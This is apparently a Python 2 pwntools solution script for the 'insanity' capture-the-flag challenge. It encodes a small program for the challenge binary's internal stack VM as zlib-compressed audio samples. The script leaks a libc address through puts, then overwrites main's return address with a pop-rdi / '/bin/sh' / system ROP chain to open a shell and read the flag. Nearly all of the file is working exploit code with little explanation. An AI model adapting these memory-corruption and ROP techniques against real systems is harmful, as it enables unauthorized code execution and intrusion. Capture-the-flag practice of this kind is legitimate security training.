#!/usr/bin/env python
from pwn import *
import zlib
import StringIO

PROG='./insanity'
context.binary = ELF(PROG)
REMOTE = ('insanity_thereisnorightandwrongtheresonlyfunandboring.quals.shallweplayaga.me',18888)

if not args.REMOTE:
    s = process(PROG, aslr=args.aslr,env={'LD_LIBRARY_PATH':'.'})
else:
    s = remote(*REMOTE)

with open('no.raw') as fin:
    word_no = fin.read()
with open('insane.raw') as fin:
    insane = fin.read()
silence = '\x00'*3000

with open('insanity.raw') as fin:
    insanity = fin.read() 

def send_buffer(buf):
    """
    Send no.raw and then the buffer
    """
    in_data = word_no
    masked_data = ""
    for i in in_data:
        masked_data += chr(ord(i)^0x80)

    comp_val = zlib.compress(masked_data + buf, 9)
    assert len(comp_val) <= 0x10000
    s.write(struct.pack("<L", len(comp_val)))
    s.write(comp_val)

def send_value(val):
    """
    Send the integer val by sending val*insanity and an insane
    """
    masked_data = ""
    in_data = ""

    for i in range(val):
        if i % 3 == 0:
            in_data = in_data.ljust(0x10000*(i/3), '\x01')
        in_data += insanity
        in_data += '\x03'*14000

    in_data += insane
    for i in in_data:
        masked_data += chr(ord(i)^0x80)

    comp_val = zlib.compress(masked_data, 9)
    # Apparantly this assert isn't necessary... after looking at the code during write up
    assert len(comp_val) <= 0x10000
    s.write(struct.pack("<L", len(comp_val)))
    s.write(comp_val)


OPS = {
    'get_insanity': 1, # d[++c] = &"insanity" on stack
    'add': 2, # d[c] = d[c-1] - d[c]; c-=1
    'strcat': 2, # d[c-1] = malloc'd(strcat(d[c],d[c-1]))
    'sub': 3, # d[c] = d[c-1] - d[c]; c-=1
    'mult': 4, # d[c] = d[c] * d[c-1]; c-=1
    'cmp': 5, #ints - d[c-1] = d[c] == d[c-1]; c -=1
                # str - d[c-2] = strcmp(d[c], d[c-1]) == 0; c -= 1
    'load': 6,  # param = data[++cur_op]; data[c] = data[param] [data[c]];
                # param = 0; data[c] = data[data[c]]

    'store': 7,  # idx = data[c]; val = data[c-1]; data[idx] = val; c-=2
    'jmp': 8, # if (d[c-1]) { cur_op += d[c]-1 }; c-=2
    'store_chr': 9, # d[c] = malloc(2); d[c-1][0] = d[c-1]
    'store_int': 10, # d[++c] = op_code-10
}


def do():
    #Initial 'program' to jump into full code
    send_value(OPS['add'])
    send_value(OPS['mult'])
    send_value(OPS['mult'])
    send_value(OPS['mult'])
    send_value(OPS['mult'])
    send_value(OPS['jmp'])
    send_value(1)
    send_value(13)
    send_value(12)
    send_value(11)
    send_value(11)

    
    #Build up full code.. 
    # This is the leak code.....
    ret_offset = 0x41f98
    call_offset = (-224-8)

    write_ret = 0x136e
    write_plt = 0x203048
    puts_plt = 0x203038
    buf_leak = [
        (OPS['store_int']+(call_offset/8))&0xffffffffffffffff,
        OPS['load'],
        0,
        
        OPS['store_int'] + puts_plt - write_ret + 0x101,
        OPS['add'],
        OPS['store_int'] + 0x7fffffffffffffff - 0x100,
        OPS['add'],

        #Store in d[0]
        OPS['store_int'] + 0,
        OPS['store'],

        #Load element d[0][0]
        OPS['store_int'] + 11,
        OPS['load'],
        0,

        OPS['store_int'] + 2,
        OPS['load'],
        0,
        
        OPS['sub'],
        0,
    ]

    # Actual exploit code!
    smain = 0x21ec5
    pop_rdi = 0x22b1a - smain
    bin_sh = 0x17ccdb - smain
    system = 0x46640 - smain
    buf= [
        
        #Get main() return address
        OPS['store_int']+(ret_offset/8),
        OPS['load'],
        0,
        OPS['store_int']+ system,
        OPS['add'],
        OPS['store_int']+((ret_offset+0x10)/8),
        OPS['store'],

        OPS['store_int']+(ret_offset/8),
        OPS['load'],
        0,
        OPS['store_int']+ bin_sh,
        OPS['add'],
        OPS['store_int']+((ret_offset+8)/8),
        OPS['store'],

        OPS['store_int']+(ret_offset/8),
        OPS['load'],
        0,
        OPS['store_int']+ pop_rdi,
        OPS['add'],
        OPS['store_int']+((ret_offset+0x0)/8),
        OPS['store'],

        0,
    ]
    
    buf = flat(buf)
    send_buffer('a'*1896 + buf)
    #Send end of audio
    s.send('\x00'*4)

    try:
        s.send('cat flag\n')
        s.interactive()
        print s.recvuntil('result:')
        print s.recv(4096)
        print s.recv(4096)
        print s.recv(4096)
    except:
        pass


do()
sys.exit(0)
